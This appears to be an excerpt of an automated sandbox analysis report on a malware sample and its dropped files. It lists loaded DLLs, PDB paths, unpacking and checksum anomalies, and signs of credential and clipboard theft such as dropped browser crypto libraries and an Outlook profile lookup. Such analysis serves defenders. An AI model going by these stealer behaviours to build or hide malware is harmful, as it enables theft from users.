                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: msvcp140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: vcruntime140.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: msimg32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: oledlg.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: pla.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: tdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: oledlg.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: netapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: samcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: dwmapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: riched20.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: usp10.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: msls31.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: dbghelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: pla.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: pdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: tdh.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: cabinet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: wevtapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: shdocvw.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exeSection loaded: winhttp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: security.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: secur32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: olepro32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: netapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: samcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wkscli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: schedcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: logoncli.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: msxml6.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: idndl.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: bitsproxy.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.3.exeSection loaded: dwmapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\HDBKJEGIEB.exeSection loaded: apphelp.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: TNQTc6Qmkg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: mozglue.pdbP source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
                              Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000005.00000002.2297845560.000000006C867000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000D.00000002.2732283280.000000006AF27000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr
                              Source: Binary string: PC:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                              Source: Binary string: nss3.pdb@ source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
                              Source: Binary string: C:\nezudavoxuyel-61\padij\piw.pdb source: TNQTc6Qmkg.exe
                              Source: Binary string: C:\puvosipuru_cece\hifikedaze\16 fimicupufe\xilucusamitavu_tub.pdb source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000000.1726640432.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                              Source: Binary string: wntdll.pdbUGP source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: run.exe, 00000005.00000002.2297527350.0000000004060000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297404283.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2296477415.00000000027E3000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594738875.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594968333.00000000057A0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2729599032.0000000002B4B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730864076.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2731390962.000000000434D000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971130898.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971777839.00000000058A0000.00000004.00001000.00020000.00000000.sdmp
                              Source: Binary string: nss3.pdb source: u3bs.0.exe, 00000001.00000002.3000426783.000000006C7EF000.00000002.00000001.01000000.0000000E.sdmp, nss3.dll.1.dr
                              Source: Binary string: mozglue.pdb source: u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
                              Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: HDBKJEGIEB.exe, 0000001A.00000002.2969121960.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, HDBKJEGIEB.exe, 0000001A.00000000.2862082755.0000000000B0C000.00000002.00000001.01000000.00000014.sdmp, tiktok[1].exe.1.dr
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UIxMarketPlugin.pdb source: UIxMarketPlugin.dll.5.dr
                              Source: TNQTc6Qmkg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: TNQTc6Qmkg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: TNQTc6Qmkg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: TNQTc6Qmkg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: TNQTc6Qmkg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeUnpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeUnpacked PE file: 0.2.TNQTc6Qmkg.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeUnpacked PE file: 1.2.u3bs.0.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                              Source: relay.dll.0.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                              Source: osssciedmed.6.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                              Source: tiktok[1].exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                              Source: HDBKJEGIEB.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                              Source: TNQTc6Qmkg.exeStatic PE information: real checksum: 0x6f60e should be: 0x6f617
                              Source: bxhlahunbhc.14.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                              Source: relay.dll.5.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                              Source: u3bs.3.exe.0.drStatic PE information: section name: .didata
                              Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                              Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                              Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                              Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                              Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                              Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                              Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: C:\Users\user\Desktop\TNQTc6Qmkg.exeCode function: 0_2_0042786C push ecx; ret 0_2_0042787C
